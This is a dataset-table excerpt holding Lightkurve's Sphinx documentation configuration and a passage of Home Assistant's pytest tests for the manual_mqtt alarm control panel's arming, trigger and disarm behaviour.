| blob_id (string, length 40) | directory_id (string, length 40) | path (string, length 4 to 721) | content_id (string, length 40) | detected_licenses (list, length 0 to 57) | license_type (string, 2 classes) | repo_name (string, length 5 to 91) | snapshot_id (string, length 40) | revision_id (string, length 40) | branch_name (string, 321 classes) | visit_date (timestamp[ns], 2016-08-12 09:31:09 to 2023-09-06 10:45:07) | revision_date (timestamp[ns], 2010-09-28 14:01:40 to 2023-09-06 06:22:19) | committer_date (timestamp[ns], 2010-09-28 14:01:40 to 2023-09-06 06:22:19) | github_id (int64, 426 to 681M) | star_events_count (int64, 101 to 243k) | fork_events_count (int64, 0 to 110k) | gha_license_id (string, 23 classes) | gha_event_created_at (timestamp[ns], 2012-06-28 18:51:49 to 2023-09-14 21:59:16, nullable) | gha_created_at (timestamp[ns], 2008-02-11 22:55:26 to 2023-08-10 11:14:58, nullable) | gha_language (string, 147 classes) | src_encoding (string, 26 classes) | language (string, 2 classes) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 6 to 10.2M) | extension (string, 115 classes) | filename (string, length 3 to 113) | content (string, length 6 to 10.2M) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a4bbcef980b3d22943fdfba566982d8edf9f6e12
|
224a034669068398e59962d6470fb72dbe20e8c9
|
/docs/source/conf.py
|
c2ebdda082831d47b8d8224559261816deecc620
|
[
"MIT"
] |
permissive
|
lightkurve/lightkurve
|
b892b54ffbf3cb956f88300cb7d72b7e99fefdbf
|
7d485b69e9bbe58a1e7ba8d988387dc5d469ab36
|
refs/heads/main
| 2023-08-28T05:20:55.072927
| 2023-08-22T20:42:53
| 2023-08-22T20:42:53
| 118,387,904
| 148
| 66
|
MIT
| 2023-09-14T02:24:36
| 2018-01-22T00:49:59
|
Python
|
UTF-8
|
Python
| false
| false
| 5,016
|
py
|
conf.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
import lightkurve
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.mathjax',
'sphinx.ext.intersphinx',
'sphinx.ext.viewcode',
'nbsphinx',
'numpydoc',
'sphinxcontrib.rawfiles']
autosummary_generate = True
# Disable RequireJS because it creates a conflict with bootstrap.js.
# This conflict breaks the navigation toggle button.
# The exact consequence of disabling RequireJS is not understood
# -- likely it means that notebook widgets may not work?
nbsphinx_requirejs_path = ""
numpydoc_show_class_members = False
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# Exclude build directory and Jupyter backup files:
exclude_patterns = ['_build', '**.ipynb_checkpoints']
# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = ".".join(lightkurve.__version__.split('.')[:2])
# The full version, including alpha/beta/rc tags.
release = lightkurve.__version__
# General information about the project.
project = f'Lightkurve v{version}'
copyright = 'Lightkurve developers'
author = 'Lightkurve developers'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ["**/.ipynb_checkpoints"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# Execute notebooks? Possible values: 'always', 'never', 'auto' (default)
nbsphinx_execute = "auto"
# Some notebook cells take longer than 60 seconds to execute
nbsphinx_timeout = 500
# Prolog inserted at the top of each notebook-based page:
nbsphinx_prolog = r"""
{% set docname = env.doc2path(env.docname, base=None) %}
.. only:: html
.. raw:: html
<div style="float:right; margin-bottom:1em;">
<a href="https://github.com/lightkurve/lightkurve/raw/main/docs/source/{{ docname }}"><img src="https://img.shields.io/badge/Notebook-Download-130654?logo=Jupyter&labelColor=fafafa"></a>
<a href="https://timeseries.science.stsci.edu/hub/user-redirect/git-pull?repo=https%3A%2F%2Fgithub.com%2Flightkurve%2Flightkurve&urlpath=lab%2Ftree%2Flightkurve%2Fdocs%2Fsource%2F{{ docname }}&branch=main"><img src="https://img.shields.io/badge/Notebook-Open%20in%20TIKE-130654?logo=Jupyter&labelColor=fafafa"></a>
</div>
<br style="clear:both;">
"""
# -- Options for HTML output ----------------------------------------------
html_theme = 'pydata_sphinx_theme'
html_theme_options = {
"external_links": [],
"github_url": "https://github.com/lightkurve/lightkurve",
"google_analytics_id": "UA-69171-9",
}
html_title = "Lightkurve "
html_static_path = ['_static']
html_css_files = [
'css/custom.css',
]
html_sidebars = {
"tutorials/*": [],
"tutorials/*/*": [],
"tutorials/*/*/*": [],
}
# Raw files we want to copy using the sphinxcontrib-rawfiles extension:
# - CNAME tells GitHub the domain name to use for hosting the docs
# - .nojekyll prevents GitHub from hiding the `_static` dir
rawfiles = ['CNAME', '.nojekyll']
# Make sure text marked up `like this` will be interpreted as Python objects
default_role = 'py:obj'
# intersphinx enables links to classes/functions in the packages defined here:
intersphinx_mapping = {'python': ('https://docs.python.org/3/', None),
'numpy': ('https://docs.scipy.org/doc/numpy/', None),
'scipy': ('https://docs.scipy.org/doc/scipy/reference', None),
'matplotlib': ('https://matplotlib.org', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'astropy': ('https://docs.astropy.org/en/latest/', None)}
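# As a hedged illustration of what `default_role = 'py:obj'` plus the
# intersphinx mapping above enable: names marked up `like this` in numpydoc
# docstrings resolve to links into the external documentation sites listed in
# the mapping. The function below is hypothetical and exists only to show the
# markup; it would live in the lightkurve package itself, not in conf.py.
def _example_fold(time, period):
    """Fold observation times (illustration of cross-reference markup only).

    Parameters
    ----------
    time : `numpy.ndarray`
        Observation times; the default role turns this into a link to the
        NumPy docs via the 'numpy' intersphinx entry.
    period : float
        Folding period; see also :func:`numpy.mod` for the operation used.
    """
    import numpy as np

    return np.mod(time, period) / period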
|
a7222f6246a13b31c012dfd7eeb2811225320b75
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/tests/components/manual_mqtt/test_alarm_control_panel.py
|
0df1114bf30d89726c015b3c98dc690a146f00b6
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 48,514
|
py
|
test_alarm_control_panel.py
|
"""The tests for the manual_mqtt Alarm Control Panel component."""
from datetime import timedelta
from unittest.mock import patch
from freezegun import freeze_time
import pytest
from homeassistant.components import alarm_control_panel
from homeassistant.const import (
ATTR_CODE,
ATTR_ENTITY_ID,
SERVICE_ALARM_ARM_AWAY,
SERVICE_ALARM_ARM_CUSTOM_BYPASS,
SERVICE_ALARM_ARM_HOME,
SERVICE_ALARM_ARM_NIGHT,
SERVICE_ALARM_ARM_VACATION,
STATE_ALARM_ARMED_AWAY,
STATE_ALARM_ARMED_CUSTOM_BYPASS,
STATE_ALARM_ARMED_HOME,
STATE_ALARM_ARMED_NIGHT,
STATE_ALARM_ARMED_VACATION,
STATE_ALARM_DISARMED,
STATE_ALARM_PENDING,
STATE_ALARM_TRIGGERED,
)
from homeassistant.core import HomeAssistant
from homeassistant.exceptions import HomeAssistantError
from homeassistant.setup import async_setup_component
import homeassistant.util.dt as dt_util
from tests.common import (
assert_setup_component,
async_fire_mqtt_message,
async_fire_time_changed,
)
from tests.components.alarm_control_panel import common
from tests.typing import MqttMockHAClient
CODE = "HELLO_CODE"
async def test_fail_setup_without_state_topic(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test for failing with no state topic."""
with assert_setup_component(0, alarm_control_panel.DOMAIN) as config:
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "mqtt_alarm",
"command_topic": "alarm/command",
}
},
)
assert not config[alarm_control_panel.DOMAIN]
async def test_fail_setup_without_command_topic(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test failing with no command topic."""
with assert_setup_component(0, alarm_control_panel.DOMAIN):
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
alarm_control_panel.DOMAIN: {
"platform": "mqtt_alarm",
"state_topic": "alarm/state",
}
},
)
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_no_pending(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Test arm method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: CODE},
blocking=True,
)
assert hass.states.get(entity_id).state == expected_state
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_no_pending_when_code_not_req(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Test arm method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"code_arm_required": False,
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: CODE},
blocking=True,
)
assert hass.states.get(entity_id).state == expected_state
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_with_pending(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Test arm method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"pending_time": 1,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: CODE},
blocking=True,
)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
state = hass.states.get(entity_id)
assert state.attributes["post_pending_state"] == expected_state
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == expected_state
# Do not go to the pending state when updating to the same state
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: CODE},
blocking=True,
)
assert hass.states.get(entity_id).state == expected_state
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_with_invalid_code(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Attempt to arm without a valid code."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"pending_time": 1,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
with pytest.raises(HomeAssistantError, match=r"^Invalid alarm code provided$"):
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: f"{CODE}2"},
blocking=True,
)
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_with_template_code(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Attempt to arm with a template-based code."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code_template": '{{ "abc" }}',
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test", ATTR_CODE: "abc"},
blocking=True,
)
state = hass.states.get(entity_id)
assert state.state == expected_state
@pytest.mark.parametrize(
("service", "expected_state"),
[
(SERVICE_ALARM_ARM_AWAY, STATE_ALARM_ARMED_AWAY),
(SERVICE_ALARM_ARM_CUSTOM_BYPASS, STATE_ALARM_ARMED_CUSTOM_BYPASS),
(SERVICE_ALARM_ARM_HOME, STATE_ALARM_ARMED_HOME),
(SERVICE_ALARM_ARM_NIGHT, STATE_ALARM_ARMED_NIGHT),
(SERVICE_ALARM_ARM_VACATION, STATE_ALARM_ARMED_VACATION),
],
)
async def test_with_specific_pending(
hass: HomeAssistant,
service,
expected_state,
mqtt_mock: MqttMockHAClient,
) -> None:
"""Test arm method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 10,
expected_state: {"pending_time": 2},
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
await hass.services.async_call(
alarm_control_panel.DOMAIN,
service,
{ATTR_ENTITY_ID: "alarm_control_panel.test"},
blocking=True,
)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
future = dt_util.utcnow() + timedelta(seconds=2)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == expected_state
async def test_trigger_no_pending(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test triggering when no pending submitted method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 1,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass, entity_id=entity_id)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
future = dt_util.utcnow() + timedelta(seconds=60)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
async def test_trigger_with_delay(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method and switch from pending to triggered."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"delay_time": 1,
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_PENDING
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=1)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state.state == STATE_ALARM_TRIGGERED
async def test_trigger_zero_trigger_time(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disabled trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 0,
"trigger_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_zero_trigger_time_with_pending(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disabled trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 2,
"trigger_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_pending(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test arm home method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 2,
"trigger_time": 3,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
state = hass.states.get(entity_id)
assert state.attributes["post_pending_state"] == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=2)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_disarm_after_trigger(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarm after trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"pending_time": 0,
"disarm_after_trigger": True,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_zero_specific_trigger_time(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"disarmed": {"trigger_time": 0},
"pending_time": 0,
"disarm_after_trigger": True,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_unused_zero_specific_trigger_time(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarm after trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"armed_home": {"trigger_time": 0},
"pending_time": 0,
"disarm_after_trigger": True,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_trigger_with_specific_trigger_time(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarm after trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"disarmed": {"trigger_time": 5},
"pending_time": 0,
"disarm_after_trigger": True,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_back_to_back_trigger_with_no_disarm_after_trigger(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test no disarm after back to back trigger."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"pending_time": 0,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_arm_away(hass, CODE, entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
await common.async_alarm_trigger(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_ARMED_AWAY
async def test_disarm_while_pending_trigger(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarming while pending state."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"trigger_time": 5,
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
await common.async_alarm_disarm(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
async def test_disarm_during_trigger_with_invalid_code(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test disarming while code is invalid."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"pending_time": 5,
"code": "12345",
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
assert (
hass.states.get(entity_id).attributes[alarm_control_panel.ATTR_CODE_FORMAT]
== alarm_control_panel.CodeFormat.NUMBER
)
await common.async_alarm_trigger(hass)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
with pytest.raises(HomeAssistantError, match=r"Invalid alarm code provided$"):
await common.async_alarm_disarm(hass, entity_id=entity_id)
assert hass.states.get(entity_id).state == STATE_ALARM_PENDING
future = dt_util.utcnow() + timedelta(seconds=5)
with patch(
("homeassistant.components.manual_mqtt.alarm_control_panel.dt_util.utcnow"),
return_value=future,
):
async_fire_time_changed(hass, future)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ALARM_TRIGGERED
async def test_trigger_with_unused_specific_delay(
hass: HomeAssistant, mqtt_mock: MqttMockHAClient
) -> None:
"""Test trigger method and switch from pending to triggered."""
assert await async_setup_component(
hass,
alarm_control_panel.DOMAIN,
{
"alarm_control_panel": {
"platform": "manual_mqtt",
"name": "test",
"code": CODE,
"delay_time": 5,
"pending_time": 0,
"armed_home": {"delay_time": 10},
"disarm_after_trigger": False,
"command_topic": "alarm/command",
"state_topic": "alarm/state",
}
},
)
await hass.async_block_till_done()
entity_id = "alarm_control_panel.test"
assert hass.states.get(entity_id).state == STATE_ALARM_DISARMED
